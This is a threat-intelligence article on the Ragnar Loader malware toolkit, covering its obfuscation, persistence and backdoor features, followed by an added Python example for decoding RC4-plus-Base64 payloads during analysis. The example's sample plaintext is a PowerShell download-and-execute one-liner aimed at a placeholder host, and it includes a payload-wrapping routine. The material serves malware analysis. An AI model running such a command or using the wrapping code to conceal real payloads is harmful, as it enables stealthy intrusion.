Ragnar Loader is a malware toolkit that threat hunters have tied to several cybercrime groups, including Ragnar Locker, FIN7, FIN8, and Ruthless Mantis (formerly known as REvil).
According to Swiss cybersecurity firm PRODAFT, Ragnar Loader is the component these groups rely on to keep long-term access to compromised networks, which lets an intrusion run for weeks or months rather than ending at initial access. Although the toolkit is most closely associated with the Ragnar Locker group, it is unclear whether that group developed it or merely leases it to other operators.
Ragnar Loader was first documented in August 2021 by Bitdefender, which linked it to a failed attack by FIN8 against an unnamed financial institution in the U.S. Its use, however, dates back to at least 2020.
In July 2023, Symantec (now part of Broadcom) described an updated version of Ragnar Loader that FIN8 was using to deliver the now-disbanded BlackCat ransomware, showing that the toolkit has been maintained and repurposed across several ransomware operations while keeping its core functionality.
Central to Ragnar Loader's effectiveness is its ability to establish long-term footholds in targeted environments, which it does through a set of techniques aimed at evading detection and surviving cleanup. Its commands are executed as PowerShell-based payloads, which are hidden under layers of RC4 encryption and Base64 encoding. Note that Base64 is an encoding, not encryption, and RC4 is a weak stream cipher: the purpose of these layers is to defeat static signatures and casual inspection, not to provide cryptographic strength, and the key needed to undo them necessarily ships with the loader. The malware also uses process injection to run its code inside other processes, giving it stealthy control over infected systems.
PRODAFT's analysis suggests that these capabilities together make Ragnar Loader resistant to common security controls and allow it to persist in environments it has infiltrated.
The malware is distributed to affiliate groups as a comprehensive package, complete with various components to facilitate reverse shell access, local privilege escalation, and remote desktop access. It also enables attackers to maintain communications with their command-and-control (C2) panel, affording them remote control over infected machines.
The payload is typically launched on victim systems via PowerShell, and Ragnar Loader incorporates a number of anti-analysis techniques that obscure its control flow and hinder reverse engineering, reducing the chance of detection by standard endpoint defenses. One practical caveat for defenders: because a PowerShell loader must decode its payload before it can execute it, PowerShell Script Block Logging (event ID 4104) records the decoded script content regardless of how it was obfuscated on disk.
Additionally, Ragnar Loader supports a range of backdoor operations, using DLL plugins and shellcode to act on the victim's environment. It can read and exfiltrate data from arbitrary files, and it is capable of lateral movement within a compromised network using PowerShell-based pivoting techniques.
Another notable component of the toolkit is a Linux executable named "bc". It establishes remote connections that let attackers run command-line instructions directly on the compromised system. PRODAFT notes that this is akin to the BackConnect modules found in malware families such as QakBot and IcedID, a tactic commonly seen in operations against enterprise targets.
The adaptability and complexity of Ragnar Loader show in its combined use of obfuscation, encryption, and anti-analysis techniques: PowerShell payloads, RC4 decryption and Base64 decoding routines, dynamic process injection, token manipulation, and lateral movement capabilities. Taken together, they illustrate the increasing sophistication of modern ransomware operations.
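The RC4-plus-Base64 layering mentioned above and in the description of the PowerShell payloads is the part of this toolkit an analyst is most likely to have to undo by hand. The following is an added example, not code from the article or from any Ragnar Loader sample: it implements RC4 (key scheduling plus the keystream generator), wraps and unwraps a payload in the two layers described, and adds a cheap plausibility check so candidate keys pulled from a loader script can be tried in bulk. The key and the PowerShell one-liner are constructed for illustration; nothing here is a real indicator.

```python
import base64

# Constructed sample: NOT an artefact from any real Ragnar Loader sample.
# Both the key and the one-liner are invented for illustration only.
SAMPLE_KEY = b"example-rc4-key"
SAMPLE_PLAINTEXT = (
    b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
)


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 stream cipher: key-scheduling algorithm followed by the PRGA.

    Encryption and decryption are the same XOR operation, so one function
    serves both directions. RC4 is included here because the text names it,
    not because it is a cipher anyone should choose today.
    """
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):  # KSA: permute S under the key
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:  # PRGA: one keystream byte per input byte
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wrap_payload(plaintext: bytes, key: bytes) -> str:
    """Apply the two layers the article describes: RC4, then Base64 encoding."""
    return base64.b64encode(rc4(key, plaintext)).decode("ascii")


def unwrap_payload(blob: str, key: bytes) -> bytes:
    """Reverse the layers: strict Base64 decode, then RC4 decrypt.

    validate=True rejects blobs padded with stray characters instead of
    silently dropping them, which would otherwise corrupt the keystream offset.
    """
    raw = base64.b64decode(blob, validate=True)
    return rc4(key, raw)


def build_sample_blob() -> str:
    """Produce the constructed sample blob an analyst would be handed."""
    return wrap_payload(SAMPLE_PLAINTEXT, SAMPLE_KEY)


def looks_like_powershell(data: bytes) -> bool:
    """Plausibility check for a candidate decrypt: mostly printable ASCII plus
    at least one PowerShell marker. A wrong RC4 key yields byte noise that
    fails the printable ratio almost immediately."""
    if not data:
        return False
    printable = sum(32 <= b < 127 or b in (9, 10, 13) for b in data)
    if printable / len(data) < 0.95:
        return False
    text = data.decode("ascii", errors="ignore").lower()
    return any(m in text for m in ("iex", "invoke-expression", "new-object", "$", "-enc"))


def recover_with_candidate_keys(blob: str, candidates):
    """Try each candidate key in order; return (key, plaintext) for the first
    plausible decrypt, or None if no candidate produces readable PowerShell."""
    for key in candidates:
        try:
            plaintext = unwrap_payload(blob, key)
        except ValueError:  # binascii.Error is a ValueError subclass
            return None
        if looks_like_powershell(plaintext):
            return key, plaintext
    return None


if __name__ == "__main__":
    blob = build_sample_blob()
    print("blob:", blob)
    hit = recover_with_candidate_keys(blob, [b"wrong-guess", SAMPLE_KEY])
    print("recovered:", hit)
```

In practice the candidate keys come from the loader script itself: a string literal passed to the decryption routine, or a value computed from something stable such as a hostname or a hard-coded seed. The plausibility check is deliberately loose because its job is only to discard obvious noise; the analyst still reads whatever it accepts.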